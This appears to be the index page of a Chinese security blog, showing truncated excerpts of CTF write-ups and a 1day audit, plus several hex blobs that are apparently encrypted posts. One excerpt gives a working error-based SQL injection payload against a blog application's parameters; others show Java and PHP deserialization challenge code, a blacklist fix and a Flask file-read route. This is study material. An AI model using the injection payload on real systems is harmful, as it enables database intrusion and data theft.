L的博客

aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db16f6b84918efa2c5e36af8e5ecf3d1f58e2a875b2b3f2ca38b1fb02105711657793a8ecb041b0bc58c20523744c9d9514a45e54bbe675764b0c37444af58d56bb6e0ac193849421c791a6f6e6320304b92eff76b0513b213053c50607d55b97a236c37fdfb0299c5929454bd73b212484de9e31103a448d53338f36f6fcc1176046b4b9759695d23cc5a501cc5da95c0b1ad08a26ae5cd556a50a1faeb39cf1ce9c980ef4f47d384514a3bb5fcd9ce3684edf80b4457b1c3b832cbd05f929ac7ea4160c861250ee779a66db49a8bb55758ded73b14cf97b57b ...

aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db1154dc11004e2c8e760db0814a794c499291747cb94f1010f9c6e43019d15949342ccadc356deed5c6f392b3f0bce921ea7fc848be76b590ce0247b5f6371f88884ad18eafc53058318413b487815741a05f2426be88cd701373195b78f3dafbe091a93ec1ec33ff71b74002c3347e71cfc850ed59c6c0c658090e432ad024a164e354c665a85a7194eed967e4679f810c3c931214dd614d93b888354eee44d4bb4ec2ec8e480fb6ee1f03db9c8b08775684c8091880da619b17a67683916a69f50a85ae267d444e782f55206a3e6ca0943c2bfd3fc6aa1a38 ...

简单审一些前台1day吧，前台的漏洞还真不怎么好挖，水后台的漏洞又没什么意思。两个简单的sql注入，Issues上看到的 auto_excerpt=y&logcontent=123\&as_logid=1&cover=or extractvalue(0x0a,concat(0x0a,(select database())))#

福建农林大学攻防一队wpjustDeserialize com.example.ezjav.utils.User下有反射调用为恶意类重写输入流将该类加入黑名单 123456789101112131415161718192021222324252627282930313233343536373839package com.example.ezjav.controller;import java.io.IOException;import java.io.InputStream;import java.io.ObjectInputStream;import java.io.ObjectStreamClass;import java.util.HashSet;import java.util.Set;*public class NewObjectInputStream extends ObjectInputStream { private static final Set<String> BLACKLISTED_CLASSES = new HashSet(); ...

123#!/bin/bashsed -i s#t3sec2025#s1eeps0rt#g /usr/local/lib/python2.7/dist-packages/bootstrap_admin_web/views.py 1

easy_signin 文件读取，读不了flag和environ读源码的时候发现了flag 被遗忘的反序列化 123456789101112131415161718192021222324252627<?phpfunction cipher($str) { if(strlen($str)>10000){ exit(-1); } $charset = "qwertyuiopasdfghjklzxcvbnm123456789"; $shift = 4; $shifted = ""; for ($i = 0; $i < strlen($str); $i++) { $char = $str[$i]; $pos = strpos($charset, $char); if ($pos !== false) { $new_pos = ($pos - $shift + str ...

给非预期烂了,先对各位师傅说个抱歉(难受)upload?SSTI!这题我是直接给出了源码。写了个文件上传和文件读取的逻辑。 我们看文件读取的函数就可以发现。 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455@app.route('/file/<path:filename>')def view_file(filename): try: # 1. 过滤文件名 safe_filename = secure_filename(filename) if not safe_filename: abort(400, description="无效文件名") # 2. 构造完整路径 file_path = os.path.join(app.config['UPLOAD_FOLDER' ...

c6bded76d588d5cd534ed93e2aa21dc15c9b1a318762a0a7de8a92f96025b2e27c8c6450f475b797d2344a810a73bf9d0b28615fbe52ff6c3a10acf70f99ab56ccf61d0b34bb3ca9b95dffb2d2671954ea6c9fcb884ba9e914bcd613952ec1893277785da55a923c7ccdf6b395d065e8c2df2e1fccf761342471bd739d8ff378be95513b72e10b40930d474bc7121c1272247d0a78d735d2310e29d4ce80900810869edb82f26fad20d67a65d0e5628c9cef3c3e223a2fa6d51691cb4ed70b583809587738be47f78289f729a63f6bfbc3708775f61a7710ba0f3d4a0339ad03be2c3e10271e27e16b80ddb01f8fb3ed753bdfab4e8fd8740 ...